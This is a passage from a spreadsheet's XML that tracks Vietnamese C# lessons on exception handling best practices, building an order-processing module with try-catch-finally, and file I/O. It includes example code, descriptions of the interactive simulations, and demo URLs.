    public void ProcessData(string filePath)
    {
        try
        {
            // ... logic xử lý data ...
            string content = File.ReadAllText(filePath);
            // ...
        }
        catch (FileNotFoundException ex)
        {
            _logger.LogError(ex, "Không tìm thấy file tại đường dẫn '{FilePath}'. Vui lòng kiểm tra lại.", filePath);
            throw new CustomDataProcessingException("Lỗi xử lý dữ liệu: Không thể đọc file nguồn.", ex); // Rethrow as custom exception
        }
        catch (Exception ex) // Catch-all ở đây chỉ để ghi log lỗi không mong muốn khác
        {
            _logger.LogCritical(ex, "Đã xảy ra lỗi nghiêm trọng không mong muốn khi xử lý dữ liệu từ file '{FilePath}'.", filePath);
            throw; // Rethrow để ngoại lệ lan truyền lên
        }
    }
}
Nguyên Tắc 'Fail-Fast' và 'Graceful Degradation'
Hai nguyên tắc này đại diện cho các chiến lược khác nhau nhưng bổ trợ cho nhau để xây dựng các ứng dụng mạnh mẽ.
Fail-Fast (Thất bại nhanh)
Nguyên tắc Fail-Fast khuyến khích phát hiện lỗi càng sớm càng tốt và dừng hoạt động ngay lập tức thay vì cố gắng tiếp tục với một trạng thái không hợp lệ. Mục tiêu là để ngăn chặn lỗi lan rộng và gây ra các vấn đề phức tạp hơn sau này.
Khi áp dụng Fail-Fast:
Xác thực tham số đầu vào: Kiểm tra các điều kiện tiên quyết (preconditions) của một phương thức ngay khi nó được gọi. Ví dụ, kiểm tra null cho các đối số bắt buộc hoặc phạm vi giá trị.
public void UpdateUser(int userId, string newEmail)
{
    if (userId &lt;= 0)
    {
        throw new ArgumentOutOfRangeException(nameof(userId), "User ID phải là số dương.");
    }
    if (string.IsNullOrWhiteSpace(newEmail))
    {
        throw new ArgumentNullException(nameof(newEmail), "Email không được để trống.");
    }
    // ... logic cập nhật người dùng ...
}
Xác minh trạng thái đối tượng: Đảm bảo đối tượng ở trạng thái hợp lệ trước khi thực hiện các thao tác quan trọng.
Phát hiện lỗi lập trình: Nếu một điều kiện không thể xảy ra trong một chương trình đúng đắn, hãy ném ngoại lệ ngay lập tức.
Lợi ích: Giúp phát hiện lỗi sớm trong quá trình phát triển và kiểm thử, làm cho việc gỡ lỗi dễ dàng hơn và ngăn chặn các lỗi tiềm ẩn.
Graceful Degradation (Suy giảm duyên dáng)
Nguyên tắc Graceful Degradation (hay còn gọi là "chế độ an toàn") là khả năng của một hệ thống vẫn tiếp tục hoạt động, nhưng với chức năng giảm bớt hoặc hiệu suất thấp hơn, khi một phần của nó gặp lỗi hoặc không khả dụng, thay vì dừng hoàn toàn.
Khi áp dụng Graceful Degradation:
Dịch vụ bên ngoài không khả dụng: Nếu một API của bên thứ ba hoặc một dịch vụ phụ không hoạt động, ứng dụng có thể hiển thị dữ liệu cũ, dữ liệu mặc định, hoặc ẩn tính năng đó đi thay vì hiển thị lỗi cho toàn bộ ứng dụng.
Tải hệ thống cao: Khi hệ thống quá tải, bạn có thể tạm thời tắt một số tính năng không cốt lõi để giữ cho các tính năng quan trọng hoạt động.
Tính năng không cốt lõi gặp lỗi: Nếu một tính năng phụ gặp lỗi, hãy đảm bảo nó không ảnh hưởng đến các tính năng chính.
Lợi ích: Tăng cường tính khả dụng và trải nghiệm người dùng bằng cách cung cấp một số chức năng thay vì không có gì, đặc biệt quan trọng trong các ứng dụng hướng người dùng.
Ví dụ: Một ứng dụng thương mại điện tử không thể tải được ảnh sản phẩm từ CDN. Thay vì báo lỗi toàn bộ trang, nó có thể hiển thị một placeholder ảnh mặc định và vẫn cho phép người dùng xem thông tin sản phẩm và thêm vào giỏ hàng.
Fail-fast tập trung vào việc ngăn chặn lỗi ở cấp độ chi tiết, trong khi graceful degradation tập trung vào việc duy trì hoạt động ở cấp độ hệ thống lớn hơn khi lỗi không thể tránh khỏi xảy ra. Cả hai đều là những nguyên tắc quan trọng để xây dựng ứng dụng C# bền vững và mạnh mẽ.</t>
        </is>
      </c>
      <c r="W28" s="22" t="inlineStr">
        <is>
          <t># Các nguyên tắc vàng trong xử lý ngoại lệ
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Quyết định khi nào nên bắt ngoại lệ và khi nào nên để nó lan truyền lên trên.
- Giải thích vì sao không nên "nuốt lỗi" bằng `catch` rỗng hoặc `catch (Exception)` tùy tiện.
- Phân biệt `throw;` và `throw ex;` và chọn đúng cách ném lại.
- Dùng `TryParse` thay vì `try-catch` cho lỗi dự đoán được.
- Quan sát ba lỗi thực hành phổ biến và cách sửa qua hoạt động mô phỏng, so sánh "nên tránh" với "nên làm".
## Khi nào bắt, khi nào để lan truyền
Ngoại lệ ném ra ở một phương thức sẽ đi ngược lên chuỗi các phương thức đã gọi nó cho đến khi gặp `catch` phù hợp. Câu hỏi quan trọng là: **ai đủ thông tin để xử lý lỗi này?**
**Nên bắt ngoại lệ khi:**
- Bạn xử lý được một cách có ý nghĩa: thử lại, dùng giá trị mặc định, tạo tệp mới, hoặc báo cho người dùng.
- Bạn cần chuyển ngoại lệ cấp thấp thành ngoại lệ có ý nghĩa hơn cho tầng trên.
- Bạn đứng ở ranh giới ứng dụng (giao diện, API) và muốn hiển thị thông báo thân thiện thay vì để chương trình sập.
- Bạn cần giải phóng tài nguyên. Hãy dùng `using` hoặc `finally`.
**Nên để lan truyền khi:**
- Tại chỗ bạn không biết xử lý thế nào. Tầng cao hơn thường có ngữ cảnh tốt hơn.
- Đó là lỗi lập trình như `NullReferenceException` hay `IndexOutOfRangeException`. Để chúng lộ ra giúp bạn phát hiện và sửa mã sớm.
Nguyên tắc chung: **chỉ bắt loại ngoại lệ cụ thể mà bạn biết cách xử lý**.
## Ba lỗi thực hành phổ biến
### 1. Nuốt lỗi
"Nuốt lỗi" là bắt ngoại lệ rồi không làm gì cả, hoặc chỉ ghi log rồi chạy tiếp như không có chuyện gì:
```csharp
using System;
public class Program
{
    static decimal Total(string q)
    {
        try
        {
            return decimal.Parse(q) * 5000;
        }
        catch { }       // nuốt lỗi: không log, không thông báo
        return 0;
    }
    public static void Main()
    {
        Console.WriteLine(Total("abc"));   // 0 (không ai biết đây là lỗi)
    }
}
```
Tổng tiền ra 0 nhưng không ai biết đó là số thật hay do lỗi. Cách làm tốt hơn là bắt đúng loại ngoại lệ, ghi log rồi **ném lại** để tầng trên xử lý tiếp:
```csharp
catch (FormatException ex)
{
    Console.WriteLine("[LOG] " + ex.Message);
    throw;      // báo lỗi lên trên
}
```
Tương tự, hạn chế `catch (Exception)` chung chung vì nó bắt cả những lỗi bạn không lường trước và che giấu nguyên nhân thật. Chỉ nên dùng ở ranh giới cao nhất của ứng dụng để ghi log và hiển thị một thông báo chung.
### 2. `throw ex;` làm mất dấu vết
Khi cần ném lại ngoại lệ trong `catch`:
- `throw;` ném lại **đúng ngoại lệ cũ** và giữ nguyên **stack trace** (danh sách các lời gọi dẫn tới lỗi).
- `throw ex;` coi như ném một ngoại lệ mới tại dòng này, nên stack trace bị đặt lại và mất dòng chỉ nơi lỗi gốc xảy ra.
```csharp
try { return ParseQuantity(q); }
catch (FormatException ex)
{
    // ... làm thêm việc gì đó ...
    throw;      // nên dùng
    // throw ex;  // nên tránh
}
```
### 3. Dùng exception cho luồng bình thường
Ngoại lệ dành cho tình huống **bất ngờ**. Nếu dữ liệu có thể sai thường xuyên (ví dụ chuỗi người dùng nhập), hãy kiểm tra bằng `TryParse` thay vì `Parse` kèm `try-catch`. Ném ngoại lệ tốn nhiều tài nguyên hơn hẳn một phép kiểm tra thông thường:
```csharp
int bad = 0;
foreach (var line in lines)
{
    if (!int.TryParse(line, out _))
        bad++;
}
```
## Ghi log ngoại lệ hiệu quả
Khi ghi log, nên có: loại ngoại lệ, `ex.Message`, `ex.StackTrace`, `ex.InnerException` (nếu có), cùng ngữ cảnh như giá trị tham số hay đường dẫn tệp. Không ghi thông tin nhạy cảm như mật khẩu. Ghi log tại nơi bạn bắt và xử lý, tránh ghi cùng một lỗi nhiều lần ở mỗi tầng. Trong ứng dụng thật, nên dùng thư viện logging (ví dụ `ILogger` trong .NET) thay cho `Console.WriteLine`.
## Hoạt động: Nên tránh và nên làm
Mô phỏng dưới đây có ba tab, mỗi tab so sánh hai cột: cột trái là cách **nên tránh**, cột phải là cách **nên làm**. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Nuốt lỗi**. Cả hai cột gọi `Total("abc")`, và `decimal.Parse("abc")` ném `FormatException` với thông báo "The input string 'abc' was not in a correct format.". Cột trái dùng `catch { }`: thẻ "Thông tin lỗi còn lại" chuyển sang cảnh báo vì lỗi bị nuốt, hàm trả về 0 và in `0`. Cột phải bắt `FormatException`, ghi dòng `[LOG]`, rồi `throw;` đưa lỗi lên `Main`, nơi in "Số lượng sai". Bên phải vừa có log vừa có thông báo cho người dùng.
- Mở tab **throw ex và throw**. Lỗi gốc ở `ParseQuantity`; `Load` bắt rồi ném lại, chỉ khác một từ. Cột trái dùng `throw ex;`: stack trace cuối cùng chỉ còn 2 dòng, dòng `ParseQuantity` bị đánh dấu đã mất. Cột phải dùng `throw;`: còn đủ 3 dòng (`ParseQuantity`, `Load`, `Main`) đều màu xanh.
- Mở tab **Dùng exception cho luồng thường**. Chương trình đọc 1.000 dòng, trong đó 300 dòng không phải số. Hình minh họa hiển thị 10 dòng đầu, các ô `12` hợp lệ và ô `abc` (dòng sai đầu tiên là dòng thứ 8). Cột trái dùng `Parse` và `try-catch`: mỗi dòng sai ném một exception, thẻ `FormatException` xuất hiện, bộ đếm lên 300. Cột phải dùng `TryParse`: bộ đếm "Số exception đã ném" luôn là 0. Cả hai đều in `300`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/cac-nguyen-tac-vang-trong-xu-ly-ngoai-le/" title="Nguyên tắc vàng khi xử lý ngoại lệ" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: không để lỗi biến mất, hãy xử lý thật sự hoặc ghi log rồi ném lại bằng `throw;`. Lỗi dự đoán được thì kiểm tra bằng `TryParse`, để exception cho tình huống bất ngờ.
## Fail-fast và Graceful degradation
Hai nguyên tắc bổ trợ nhau:
- **Fail-fast (thất bại nhanh):** phát hiện lỗi sớm và dừng ngay, thay vì chạy tiếp với trạng thái sai. Ví dụ: kiểm tra tham số ngay đầu phương thức rồi ném `ArgumentException` hoặc `ArgumentOutOfRangeException`.
- **Graceful degradation (suy giảm duyên dáng):** khi một phần không cốt lõi gặp sự cố, hệ thống vẫn chạy với chức năng giảm bớt. Ví dụ: trang bán hàng không tải được ảnh sản phẩm thì hiện ảnh mặc định, người dùng vẫn xem thông tin và đặt mua được.
Fail-fast giúp bắt lỗi ở mức chi tiết, graceful degradation giữ cho hệ thống lớn tiếp tục phục vụ khi lỗi không tránh được.
## Tóm tắt
- Chỉ bắt ngoại lệ cụ thể mà bạn biết xử lý; nếu không, để nó lan truyền.
- Không nuốt lỗi bằng `catch` rỗng; hạn chế `catch (Exception)` ngoài ranh giới ứng dụng.
- Ném lại bằng `throw;` để giữ nguyên stack trace, tránh `throw ex;`.
- Lỗi dự đoán được dùng `TryParse` hoặc kiểm tra điều kiện, đừng dựa vào exception.
- Ghi log đủ ngữ cảnh, không lộ thông tin nhạy cảm, và không ghi trùng một lỗi nhiều lần.
- Fail-fast để phát hiện lỗi sớm; graceful degradation để hệ thống vẫn chạy khi một phần gặp sự cố.</t>
        </is>
      </c>
    </row>
    <row r="29" ht="409.6" customHeight="1" s="18">
      <c r="A29" s="10" t="n">
        <v>29</v>
      </c>
      <c r="B29" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C29" s="10" t="inlineStr">
        <is>
          <t>Thực hành Tổng hợp và Best Practices</t>
        </is>
      </c>
      <c r="D29" s="10" t="inlineStr">
        <is>
          <t>Xây dựng một module xử lý dữ liệu với xác thực và try-catch-finally</t>
        </is>
      </c>
      <c r="E29" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F29" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G29" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H29" s="10" t="inlineStr">
        <is>
          <t>Thấy xác thực, try-catch và finally phối hợp trong một luồng xử lý hoàn chỉnh.</t>
        </is>
      </c>
      <c r="I29" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J29" s="10" t="inlineStr">
        <is>
          <t>Băng chuyền 4 trạm: Đọc → Xác thực → Xử lý → Ghi log (finally). Mỗi bản ghi là một 'kiện hàng' đi qua; trạm báo lỗi đổi màu; trạm finally luôn sáng.</t>
        </is>
      </c>
      <c r="K29" s="10" t="inlineStr">
        <is>
          <t>H09, H04, H21</t>
        </is>
      </c>
      <c r="L29" s="10" t="inlineStr">
        <is>
          <t>Dữ liệu hợp lệ | Dữ liệu sai | Lỗi hệ thống</t>
        </is>
      </c>
      <c r="M29" s="10" t="inlineStr">
        <is>
          <t>Hợp lệ: đơn (Bút, 2, 5000) qua đủ 4 trạm, tổng 10000, log "OK".
Dữ liệu sai: số lượng −1 bị trạm Xác thực chặn (không ném exception), log "Bỏ qua: số lượng không hợp lệ".
Lỗi hệ thống: trạm Xử lý gặp exception bất ngờ (ví dụ không ghi được tệp) → catch báo lỗi → finally vẫn ghi log.
Bước cuối mỗi tab: đèn trạm finally luôn sáng.</t>
        </is>
      </c>
      <c r="N29" s="10" t="inlineStr">
        <is>
          <t>Đơn hàng mẫu</t>
        </is>
      </c>
      <c r="O29" s="10" t="inlineStr">
        <is>
          <t>Xác thực xử lý lỗi dự đoán được; try-catch xử lý lỗi bất ngờ; finally dọn dẹp và ghi log trong mọi trường hợp.</t>
        </is>
      </c>
      <c r="P29" s="10" t="n"/>
      <c r="Q29" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/xay-dung-mot-module-xu-ly-du-lieu-voi-xac-thuc-va-try-catch-finally/index.html</t>
        </is>
      </c>
      <c r="R29" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/xay-dung-mot-module-xu-ly-du-lieu-voi-xac-thuc-va-try-catch-finally/</t>
        </is>
      </c>
      <c r="S29" s="10" t="n"/>
      <c r="T29" s="12" t="n"/>
      <c r="U29" s="12" t="n"/>
      <c r="V29" s="21" t="inlineStr">
        <is>
          <t>Chiến lược thiết kế Module xử lý dữ liệu tin cậy
Trong các bài học trước, chúng ta đã thảo luận về triết lý xử lý ngoại lệ và các nguyên tắc cốt lõi. Bây giờ là lúc áp dụng tư duy đó vào một tình huống thực tế: xây dựng một Module Xử lý Dữ liệu (Data Processing Module). Mục tiêu không chỉ là ngăn ứng dụng bị "văng" (crash), mà là xây dựng một quy trình làm việc minh bạch, nơi tài nguyên luôn được bảo vệ và dữ liệu đầu vào luôn được kiểm chứng trước khi xử lý.
Kiến trúc xác thực đầu vào (Input Validation)
Trước khi thực hiện bất kỳ thao tác logic nào, việc xác thực dữ liệu là "tuyến phòng thủ" đầu tiên. Thay vì bọc toàn bộ code trong try-catch, hãy chủ động kiểm tra tính hợp lệ của dữ liệu để ngăn chặn ngoại lệ ngay từ nguồn.
Sử dụng mô hình Guard Clauses (mệnh đề bảo vệ) để loại bỏ các trường hợp không hợp lệ sớm nhất có thể:
public void ProcessUserData(string inputData)
{
    // Xác thực sớm
    if (string.IsNullOrWhiteSpace(inputData))
        throw new ArgumentException("Dữ liệu đầu vào không được để trống.", nameof(inputData));
    // Logic xử lý tiếp theo...
}
Việc ném ra các ngoại lệ cụ thể (như ArgumentException, ArgumentNullException) giúp người gọi hàm (caller) biết chính xác lý do tại sao quy trình không thể tiếp tục, thay vì để ứng dụng rơi vào trạng thái không xác định.
Triển khai logic với cấu trúc Try-Catch-Finally
Khi làm việc với các tài nguyên ngoài (như tệp tin, kết nối cơ sở dữ liệu hoặc stream mạng), khối finally đóng vai trò then chốt. Nó đảm bảo rằng dù có ngoại lệ xảy ra hay không, các tài nguyên vẫn được giải phóng đúng cách.
Dưới đây là ví dụ minh họa một module đọc và xử lý tệp tin cấu hình:
public void ProcessConfigurationFile(string filePath)
{
    StreamReader reader = null;
    try
    {
        reader = new StreamReader(filePath);
        string content = reader.ReadToEnd();
        // Giả lập xử lý dữ liệu phức tạp
        ValidateContent(content);
    }
    catch (FileNotFoundException ex)
    {
        // Ghi log lỗi chuyên biệt
        Logger.LogError($"Không tìm thấy tệp tin: {ex.FileName}");
        throw; // Lan truyền ngoại lệ nếu cần cấp cao hơn xử lý
    }
    catch (Exception ex)
    {
        Logger.LogCritical("Lỗi không xác định trong quá trình xử lý tệp.");
        throw;
    }
    finally
    {
        // Đảm bảo luôn giải phóng tài nguyên
        if (reader != null)
        {
            reader.Dispose();
        }
    }
}
Lưu ý chuyên sâu: Trong C#, sử dụng câu lệnh using là cách viết tinh gọn hơn của khối try-finally để quản lý IDisposable. Hãy ưu tiên sử dụng using bất cứ khi nào có thể để mã nguồn sạch và giảm thiểu rủi ro quên giải phóng tài nguyên.
Các phương pháp tối ưu để tối ưu hóa hiệu suất
Khi xây dựng module xử lý dữ liệu lớn, việc xử lý lỗi không đúng cách có thể làm chậm hệ thống đáng kể. Hãy tuân thủ các quy tắc sau:
Tránh sử dụng ngoại lệ cho luồng điều khiển (Flow Control): Đừng sử dụng try-catch thay cho câu lệnh if kiểm tra điều kiện. Ngoại lệ là những đối tượng nặng nề về hiệu suất.
Ghi log có ngữ cảnh: Đừng chỉ ghi "Đã xảy ra lỗi". Hãy luôn bao gồm ngữ cảnh như: ID người dùng, thời gian xảy ra, và trạng thái hệ thống tại thời điểm đó.
Phân tầng xử lý: Chỉ bắt ngoại lệ tại những nơi bạn có đủ thông tin để khắc phục hoặc ghi log có ý nghĩa. Nếu bạn không thể xử lý lỗi tại chỗ, hãy để nó lan truyền để các thành phần có thẩm quyền hơn xử lý.
Sử dụng ngoại lệ tùy chỉnh (Custom Exceptions): Đối với các nghiệp vụ phức tạp, việc tạo ra các lớp ngoại lệ riêng giúp phân biệt rõ ràng giữa lỗi hệ thống (như mất kết nối database) và lỗi nghiệp vụ (như số dư không đủ).
Tổng kết: Tư duy phòng ngự
Xây dựng một module mạnh mẽ đòi hỏi sự kết hợp hài hòa giữa tư duy phòng thủ (xác thực dữ liệu chặt chẽ) và tư duy hồi phục (xử lý ngoại lệ với finally và log).
Hãy luôn đặt câu hỏi: "Nếu bước này thất bại, điều gì sẽ xảy ra với dữ liệu của tôi?". Bằng cách lập trình với giả định rằng lỗi sẽ xảy ra, bạn sẽ xây dựng được những ứng dụng bền bỉ, dễ bảo trì và có trải nghiệm người dùng chuyên nghiệp. Khi đã thành thạo kỹ thuật này, bạn sẽ thấy sự khác biệt rõ rệt giữa một ứng dụng chạy được và một ứng dụng chạy tốt trong môi trường production thực tế.</t>
        </is>
      </c>
      <c r="W29" s="22" t="inlineStr">
        <is>
          <t># Xây dựng một module xử lý dữ liệu với xác thực và try-catch-finally
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Phối hợp xác thực đầu vào, `try-catch` và `finally` trong một luồng xử lý hoàn chỉnh.
- Phân biệt lỗi dự đoán được (dữ liệu sai) với lỗi bất ngờ (lỗi hệ thống) và chọn công cụ phù hợp cho từng loại.
- Giải thích vì sao khối `finally` luôn chạy dù có lỗi hay không.
- Viết hàm xử lý đơn hàng có xác thực, bắt `IOException` và ghi log ở `finally`.
- Quan sát một đơn hàng đi qua bốn trạm trong ba tình huống bằng hoạt động mô phỏng.
## Bài toán: module xử lý đơn hàng
Ở các bài trước, bạn đã học cách kiểm tra dữ liệu và cách dùng `try-catch-finally`. Bài này ghép chúng lại thành một module nhỏ xử lý đơn hàng. Đơn hàng đi qua bốn bước:
1. **Đọc** đơn hàng.
2. **Xác thực**: số lượng phải lớn hơn 0.
3. **Xử lý**: tính tổng tiền và lưu kết quả.
4. **Ghi log**: luôn ghi lại kết quả, dù thành công hay thất bại.
## Phân công: ai lo lỗi nào
Ba công cụ, mỗi công cụ lo một loại vấn đề:
| Công cụ | Lo việc gì | Ví dụ trong module |
|---|---|---|
| Xác thực (`if`) | Lỗi **dự đoán được**: dữ liệu sai | Số lượng nhỏ hơn hoặc bằng 0 |
| `try-catch` | Lỗi **bất ngờ**: sự cố hệ thống | Không ghi được tệp, ném `IOException` |
| `finally` | Việc **luôn phải làm** | Ghi log kết quả |
Lỗi dữ liệu sai chỉ cần chặn nhẹ nhàng bằng điều kiện, không cần ném ngoại lệ. Ngoại lệ dành cho những chuyện không lường trước như tệp đang bị chương trình khác giữ.
### Guard clause (mệnh đề bảo vệ)
Cách kiểm tra điều kiện sớm rồi thoát ngay (`return` hoặc ném ngoại lệ) gọi là **guard clause**. Nó loại bỏ trường hợp sai ngay từ đầu, nên phần xử lý chính không phải lồng quá nhiều `if`. Khi phương thức không thể tiếp tục với dữ liệu sai, ném ngoại lệ cụ thể như `ArgumentException` để người gọi biết đúng lý do.
### Khối finally
`finally` chạy **sau cùng trong mọi tình huống**: không có lỗi, có lỗi đã được bắt, hoặc đơn bị bỏ qua. Đó là nơi thích hợp để ghi log hoặc giải phóng tài nguyên. Với tài nguyên như tệp, câu lệnh `using` là cách viết gọn của `try-finally` nên nên ưu tiên dùng khi có thể.
## Mã nguồn của module
```csharp
using System;
using System.IO;
public record Order(string Name, int Qty, decimal Price);
public class Program
{
    static Order ReadOrder() =&gt; new Order("Bút", 2, 5000);
    static void Save(decimal total)
    {
        File.AppendAllText("out.txt", total + Environment.NewLine);
    }
    static void Run()
    {
        string log = "OK";
        var o = ReadOrder();
        try
        {
            if (o.Qty &lt;= 0)
                log = "Bỏ qua: số lượng sai";
            else
            {
                var t = o.Qty * o.Price;
                Save(t);
            }
        }
        catch (IOException ex)
        {
            log = "Lỗi: " + ex.Message;
        }
        finally
        {
            Console.WriteLine("LOG: " + log);
        }
    }
    public static void Main()
    {
        Run();   // LOG: OK
    }
}
```
Hãy chú ý hai điểm. Thứ nhất, `catch` chỉ bắt `IOException`, đúng loại lỗi mà module biết xử lý, chứ không bắt `Exception` chung chung. Thứ hai, dòng ghi log nằm trong `finally` nên không bao giờ bị bỏ sót.
## Hoạt động: Đơn hàng đi qua bốn trạm
Mô phỏng dưới đây chạy hàm `Run()` ở trên. Hình minh họa gồm bốn trạm: **Đọc**, **Xác thực**, **Xử lý**, **Ghi log (finally)**, cùng hai ngăn **Đã xử lý** và **Không xử lý**. Hãy thao tác theo thứ tự sau, chọn từng tab rồi bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Dữ liệu hợp lệ**. Đơn "Bút x2" có giá 5000. Đơn qua trạm Xác thực vì `o.Qty &lt;= 0` sai. Trạm Xử lý tính `t = 2 * 5000 = 10000` và `Save(t)` thành công, đơn rơi vào ngăn "Đã xử lý". Cuối cùng `finally` chạy, in `LOG: OK` và cả bốn trạm sáng xanh.
- Mở tab **Dữ liệu sai**. Đơn "Bút x-1" bị trạm Xác thực chặn vì `o.Qty &lt;= 0` đúng. Đây là lỗi dự đoán được nên chỉ gán `log = "Bỏ qua: số lượng sai"`, không ném ngoại lệ, và trạm Xử lý bị bỏ qua. Đơn nằm ở ngăn "Không xử lý". `finally` vẫn chạy và in `LOG: Bỏ qua: số lượng sai`.
- Mở tab **Lỗi hệ thống**. Đơn hợp lệ nên qua trạm Xác thực, nhưng tệp `out.txt` đang bị chương trình khác giữ nên `Save(t)` ném `IOException`. Trạm Xử lý chuyển sang đỏ, `catch (IOException ex)` bắt lỗi và gán `log = "Lỗi: ..."`, chương trình không bị sập. Đơn vào ngăn "Không xử lý" với ghi chú "không ghi được tệp". `finally` vẫn chạy và in `LOG: Lỗi: The process cannot access the file 'out.txt' because it is being used by another process.`
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/thuc-hanh-tong-hop-va-best-practices/xay-dung-mot-module-xu-ly-du-lieu-voi-xac-thuc-va-try-catch-finally/" title="Module xử lý đơn hàng" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: xác thực lo lỗi dự đoán được, `try-catch` lo lỗi bất ngờ, và `finally` luôn chạy trong cả ba tình huống. Ba công cụ phối hợp với nhau để chương trình không sập và luôn để lại dấu vết.
## Vài thực hành tốt cho module
- **Không dùng ngoại lệ thay cho `if`:** ngoại lệ nặng hơn nhiều so với một phép kiểm tra.
- **Ghi log có ngữ cảnh:** ngoài "đã xảy ra lỗi", hãy ghi đơn nào, lúc nào, lỗi gì.
- **Chỉ bắt khi xử lý được:** nếu không xử lý được tại chỗ, để ngoại lệ lan truyền lên tầng có đủ thông tin.
- **Dùng ngoại lệ tùy chỉnh khi cần:** phân biệt lỗi nghiệp vụ (số dư không đủ) với lỗi hệ thống (mất kết nối).
## Tóm tắt
- Module đáng tin cậy kết hợp tư duy phòng thủ (xác thực) và tư duy phục hồi (`try-catch-finally`).
- Xác thực chặn **lỗi dự đoán được** bằng `if`, không cần ném ngoại lệ.
- `try-catch` xử lý **lỗi bất ngờ** như `IOException`; chỉ bắt đúng loại mà bạn biết xử lý.
- `finally` luôn chạy, nên hợp để ghi log và giải phóng tài nguyên.
- Với tệp và các đối tượng `IDisposable`, ưu tiên `using` thay cho tự viết `finally`.</t>
        </is>
      </c>
    </row>
    <row r="30" ht="409.6" customHeight="1" s="18">
      <c r="A30" s="10" t="n">
        <v>30</v>
      </c>
      <c r="B30" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C30" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu chung về Thao tác File và Stream</t>
        </is>
      </c>
      <c r="D30" s="10" t="inlineStr">
        <is>
          <t>Vai trò của File I/O trong ứng dụng</t>
        </is>
      </c>
      <c r="E30" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F30" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G30" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H30" s="10" t="inlineStr">
        <is>
          <t>Thấy dữ liệu trong biến mất khi chương trình tắt, còn dữ liệu trong tệp thì vẫn còn.</t>
        </is>
      </c>
      <c r="I30" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Chỉ lưu trong biến | Lưu thêm vào tệp</t>
        </is>
      </c>
      <c r="J30" s="10" t="inlineStr">
        <is>
          <t>Mỗi cột có 2 khung: 'Bộ nhớ chương trình (RAM)' và 'Ổ đĩa' với biểu tượng notes.txt. Nút trạng thái chương trình: Đang chạy → Đã tắt (RAM xóa trắng có hiệu ứng mờ dần) → Chạy lại.</t>
        </is>
      </c>
      <c r="K30" s="10" t="inlineStr">
        <is>
          <t>H10, H12</t>
        </is>
      </c>
      <c r="L30" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M30" s="10" t="inlineStr">
        <is>
          <t>Hai cột thêm 3 ghi chú vào List&lt;string&gt; notes (RAM hiện 3 ô).
Phải gọi File.WriteAllLines("notes.txt", notes) → ổ đĩa xuất hiện tệp 3 dòng.
Tắt chương trình: RAM của cả hai cột bị xóa trắng.
Chạy lại: trái notes rỗng (Count 0).
Phải gọi File.ReadAllLines("notes.txt") → 3 ghi chú trở lại.
Xong.</t>
        </is>
      </c>
      <c r="N30" s="10" t="inlineStr">
        <is>
          <t>Ghi chú: Mua sữa, Học C#, Gọi mẹ</t>
        </is>
      </c>
      <c r="O30" s="10" t="inlineStr">
        <is>
          <t>Tệp giúp dữ liệu tồn tại lâu dài qua các lần chạy chương trình.</t>
        </is>
      </c>
      <c r="P30" s="10" t="n"/>
      <c r="Q30" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vai-tro-cua-file-i-o-trong-ung-dung/index.html</t>
        </is>
      </c>
      <c r="R30" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/gioi-thieu-chung-ve-thao-tac-file-va-stream/vai-tro-cua-file-i-o-trong-ung-dung/</t>
        </is>
      </c>
      <c r="S30" s="10" t="n"/>
      <c r="T30" s="12" t="n"/>
      <c r="U30" s="12" t="n"/>
      <c r="V30" s="21" t="inlineStr">
        <is>
          <t>Tại sao File I/O lại cần thiết trong phát triển ứng dụng?
Trong thế giới lập trình, một ứng dụng thường không tồn tại độc lập. Nó cần khả năng tương tác với môi trường bên ngoài để thực hiện các tác vụ quan trọng như lưu trữ dữ liệu, đọc cấu hình, hay giao tiếp với các hệ thống khác. Trong số các hình thức tương tác này, thao tác với file (File Input/Output, hay File I/O) đóng một vai trò nền tảng và thiết yếu.
File I/O là khả năng của một chương trình máy tính để đọc dữ liệu từ các file trên hệ thống lưu trữ (như đĩa cứng, USB, SSD) và ghi dữ liệu vào các file đó. Nếu không có File I/O, mỗi khi bạn đóng một ứng dụng, tất cả dữ liệu mà nó tạo ra hoặc sử dụng sẽ biến mất hoàn toàn. Điều này có nghĩa là ứng dụng sẽ không thể "ghi nhớ" bất cứ điều gì giữa các lần chạy, biến nó thành một công cụ rất hạn chế.
